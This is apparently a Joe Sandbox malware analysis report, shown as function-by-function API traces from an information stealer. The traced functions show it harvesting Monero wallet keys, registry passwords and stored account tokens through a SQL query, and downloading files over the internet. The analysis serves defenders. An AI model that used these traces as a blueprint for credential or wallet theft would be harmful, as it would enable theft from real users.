                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3541710228-0
                                      • Opcode ID: 91c70b4f0856570a9b86db43a4044ba3db7841ac336c90ec6a87e6c0576bbc81
                                      • Instruction ID: 4b8be17dd6e2800baf0b0a193baf7fe8bcc09ebea93aafb32b04ba199c0484b8
                                      • Opcode Fuzzy Hash: 91c70b4f0856570a9b86db43a4044ba3db7841ac336c90ec6a87e6c0576bbc81
                                      • Instruction Fuzzy Hash: 38714876900219B7CB14EBA0DC89FEE7779BF88300F048598F605A7181DA75EB45CF91
                                      Function 00521310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 005212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005212B4
                                        • Part of subcall function 005212A0: RtlAllocateHeap.NTDLL(00000000), ref: 005212BB
                                        • Part of subcall function 005212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005212D7
                                        • Part of subcall function 005212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005212F5
                                        • Part of subcall function 005212A0: RegCloseKey.ADVAPI32(?), ref: 005212FF
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052134F
                                      • lstrlen.KERNEL32(?), ref: 0052135C
                                      • lstrcat.KERNEL32(?,.keys), ref: 00521377
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 00538B60: GetSystemTime.KERNEL32(00540E1A,00F0FB78,005405AE,?,?,005213F9,?,0000001A,00540E1A,00000000,?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 00538B86
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00521465
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
                                        • Part of subcall function 005299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00529A11
                                        • Part of subcall function 005299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00529A31
                                        • Part of subcall function 005299C0: ReadFile.KERNEL32(000000FF,?,00000000,0052148F,00000000), ref: 00529A5A
                                        • Part of subcall function 005299C0: LocalFree.KERNEL32(0052148F), ref: 00529A90
                                        • Part of subcall function 005299C0: CloseHandle.KERNEL32(000000FF), ref: 00529A9A
                                      • DeleteFileA.KERNEL32(00000000), ref: 005214EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 3478931302-218353709
                                      • Opcode ID: bbb9fb3e995b5ae00383523787348a029c5cf3968f3b1403b573eb5a1115937d
                                      • Instruction ID: 5fe1472ba31ea8c0e35898cd29d8044ecead94fc6dfaf430d812ed30194f2efb
                                      • Opcode Fuzzy Hash: bbb9fb3e995b5ae00383523787348a029c5cf3968f3b1403b573eb5a1115937d
                                      • Instruction Fuzzy Hash: B25155B2D5011A67CB15FB60DC96FED773CBF94300F404198B64A62081EE746B89CFA6
                                      Function 005275D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 005272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0052733A
                                        • Part of subcall function 005272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005273B1
                                        • Part of subcall function 005272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0052740D
                                        • Part of subcall function 005272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00527452
                                        • Part of subcall function 005272D0: HeapFree.KERNEL32(00000000), ref: 00527459
                                      • lstrcat.KERNEL32(00000000,005417FC), ref: 00527606
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00527648
                                      • lstrcat.KERNEL32(00000000, : ), ref: 0052765A
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 0052768F
                                      • lstrcat.KERNEL32(00000000,00541804), ref: 005276A0
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 005276D3
                                      • lstrcat.KERNEL32(00000000,00541808), ref: 005276ED
                                      • task.LIBCPMTD ref: 005276FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID: :
                                      • API String ID: 2677904052-3653984579
                                      • Opcode ID: a769f225e4aa5a63800da0cd973372462e6e69e795b01c3f31d8c8a6e11fe05c
                                      • Instruction ID: 57b03972a81825d38c2d0fc62ffa28aa7b2612f546d1a4b8f5cdf275c60fa8d8
                                      • Opcode Fuzzy Hash: a769f225e4aa5a63800da0cd973372462e6e69e795b01c3f31d8c8a6e11fe05c
                                      • Instruction Fuzzy Hash: 72312F7190120AEBCB05EBF4EC59DFE7B74BF89301B148118E103B72A1DA78A946CF56
                                      Function 00538100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00F1E218,00000000,?,00540E2C,00000000,?,00000000), ref: 00538130
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00538137
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00538158
                                      • __aulldiv.LIBCMT ref: 00538172
                                      • __aulldiv.LIBCMT ref: 00538180
                                      • wsprintfA.USER32 ref: 005381AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2774356765-3474575989
                                      • Opcode ID: 9d3891db55d912dcc8a16f5e18bfe9282b4a1deb53c1d4d91326ae26e676299e
                                      • Instruction ID: 722dd29b419f339b1b261476511c4651af6915fce587453ccec7a175dd9db09e
                                      • Opcode Fuzzy Hash: 9d3891db55d912dcc8a16f5e18bfe9282b4a1deb53c1d4d91326ae26e676299e
                                      • Instruction Fuzzy Hash: 2F211DB1E44319ABDB04DFD4DD49FAEBBB8FB44B10F104519F605BB280D7B869018BA9
                                      Function 005260A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00524839
                                        • Part of subcall function 005247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00524849
                                      • InternetOpenA.WININET(00540DF7,00000001,00000000,00000000,00000000), ref: 0052610F
                                      • StrCmpCA.SHLWAPI(?,00F1E748), ref: 00526147
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0052618F
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005261B3
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 005261DC
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0052620A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00526249
                                      • InternetCloseHandle.WININET(?), ref: 00526253
                                      • InternetCloseHandle.WININET(00000000), ref: 00526260
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2507841554-0
                                      • Opcode ID: efbfaf289202fab1e6cae2296873da788ddc0c608b1c9a50664dc1f1a8c3cf17
                                      • Instruction ID: a414e207827295996a138bb13afa5187e37561062822d272e521bb3b024d0952
                                      • Opcode Fuzzy Hash: efbfaf289202fab1e6cae2296873da788ddc0c608b1c9a50664dc1f1a8c3cf17
                                      • Instruction Fuzzy Hash: 0C514EB1900218ABDB24DF50DC49BEE7BB8FF44701F108098F606A71C1DBB46A85CF95
                                      Function 005272D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0052733A
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005273B1
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0052740D
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00527452
                                      • HeapFree.KERNEL32(00000000), ref: 00527459
                                      • task.LIBCPMTD ref: 00527555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetask
                                      • String ID: Password
                                      • API String ID: 775622407-3434357891
                                      • Opcode ID: 6592440212915af7cff5f0dd4db61c1af5846deb94976671aaf276b892c8f3b5
                                      • Instruction ID: 1ebf21c3e07d9444204fa31f98916025e174a9f500a394c7d6efb7d876120826
                                      • Opcode Fuzzy Hash: 6592440212915af7cff5f0dd4db61c1af5846deb94976671aaf276b892c8f3b5
                                      • Instruction Fuzzy Hash: 28613CB5D0426D9BDB24DB50DC45FE9BBB8BF49300F0081E9E649A6181DBB05BC9CFA0
                                      Function 0052BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                      • lstrlen.KERNEL32(00000000), ref: 0052BC9F
                                        • Part of subcall function 00538E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00538E52
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0052BCCD
                                      • lstrlen.KERNEL32(00000000), ref: 0052BDA5
                                      • lstrlen.KERNEL32(00000000), ref: 0052BDB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 3073930149-1079375795
                                      • Opcode ID: d04a81964b8e8fa5c32cbf6bba4b08fb8766445612352990e05b66c57fae048a
                                      • Instruction ID: f27b427bd7c3753687e87b8711dbbd5486318a50e08730d617fd8aa8a5738f5b
                                      • Opcode Fuzzy Hash: d04a81964b8e8fa5c32cbf6bba4b08fb8766445612352990e05b66c57fae048a
                                      • Instruction Fuzzy Hash: A0B13272910109ABDB04FBA0DD9AEEEBB38BF94300F404558F547B6091EF746E49CB66
                                      Function 00536770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: 5c7b14e57d63d5a90ddfd7ba3ba0bfbc439ea7b0a620366c82393dd9184f152d
                                      • Instruction ID: ca1af41fbbe35d903fd58c573f2004a416a168b1a45f76aeffb2f4e453df5ba4
                                      • Opcode Fuzzy Hash: 5c7b14e57d63d5a90ddfd7ba3ba0bfbc439ea7b0a620366c82393dd9184f152d
                                      • Instruction Fuzzy Hash: 56F05E3090430AFFD3449FE0E90972C7B70FB04703F088198E60AA6290D6B84B419F9A
                                      Function 00524FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00524FCA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00524FD1
                                      • InternetOpenA.WININET(00540DDF,00000000,00000000,00000000,00000000), ref: 00524FEA
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00525011
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00525041
                                      • InternetCloseHandle.WININET(?), ref: 005250B9
                                      • InternetCloseHandle.WININET(?), ref: 005250C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                      • String ID:
                                      • API String ID: 3066467675-0
                                      • Opcode ID: 539b5c5204dab33661268d178bfac167bca2ee2424dc1a7ddf04e57271d167b1
                                      • Instruction ID: 36f847a477e24e842ade6f5319b0eba70b2fc07a21d148fa085cae3ee3a1c1dc
                                      • Opcode Fuzzy Hash: 539b5c5204dab33661268d178bfac167bca2ee2424dc1a7ddf04e57271d167b1
                                      • Instruction Fuzzy Hash: C031EBB4A00218ABDB20CF54DC89BDDB7B4FB48704F5081D9E60AB7281D7B46A858F99
                                      Function 005383DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00538426
                                      • wsprintfA.USER32 ref: 00538459
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0053847B
